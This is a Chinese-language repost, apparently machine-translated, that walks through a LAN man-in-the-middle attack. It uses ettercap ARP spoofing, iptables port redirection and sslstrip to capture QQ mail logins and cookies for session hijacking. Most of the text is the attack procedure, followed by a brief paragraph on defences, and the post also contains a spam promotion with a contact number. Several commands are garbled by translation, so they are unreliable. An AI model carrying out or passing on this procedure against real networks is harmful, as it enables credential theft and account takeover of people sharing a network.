无线网络嗅探,无线网嗅探是什么,无线电嗅探

  无线网络嗅探,无线网嗅探是什么,无线电嗅探

  首先声明这不是原创,而且这个工具也比较老。主要是帮助你了解一点黑客是如何在局域网中获取数据的。我们先来看程序运行的逻辑图。

  一、准备工作:

  我们需要安装几个软件。我的环境是centos6.5。

  使用yum安装

  Yum-y安装ettercap yum-y安装arpspoof sslstripyum-y安装arpspoof yum-y安装dsniff ssldump two-on路由转发

  因为伪装成路由器后需要将用户的数据转发给路由器,所以需要开启我的机器的路由转发功能。

  echo 1 /proc/sys/net/IP v4/IP _ forward #也可以手动修改。

  打开iptables三次

  通过iptables将http数据导入端口10000。我们使用sslstrip来监控端口10000,并获得我们想要的数据。

  iptables-t NAT-a routing-p TCP-destination-port 80-j redirect-to-port 10000-t表示要操作的表。nat表示NAT表被修改。

  -附加数据路由前链,用于在路由前将规则附加到链中。

  -p是指过滤后的数据包的协议。

  - destination-port 80表示过滤后的数据包的目的端口是80,之后将端口80的数据转发到端口10000。

  四个启动sslstrip监控端口10000

  sslstrip -l 10000

  使用ettercap进行arp欺骗(即伪装成路由器)

  eter cap-t-q-m ARP:remote/172 . 16 . 85 . 1/172 . 16 . 85 . 2/-t表示基于文本的界面运行在linux中。

  -q静音模式(无回声)

  -M开始arp欺骗攻击(这一步是伪装路由器)

  //填写被嗅探机器的IP,可以填写网段表示嗅探一个网段表示一些信息。

  效果:

  我们登录qq,得到了qq邮箱的登录账号和密码,但是密码是加密的。我们只能通过下载cooki导入自己的电脑来登录,无法直接获取密码。

  更多Python视频、源代码和资料可以免费获得,电话:725638078。

  让我们来谈谈防御:

  Sslstrip的攻击方式是中间人攻击,需要arp欺骗。也就是说,如果你拿不到你的数据,他的工具再好,他也破解不了你的数据。所以我们需要设置好浏览器本身的安全性,绑定mac和ip,将网关双向绑定到本机,或者启动arp防火墙防御arp攻击。

郑重声明:本文由网友发布,不代表盛行IT的观点,版权归原作者所有,仅为传播更多信息之目的,如有侵权请联系,我们将第一时间修改或删除,多谢。

留言与评论(共有 条评论)
   
验证码: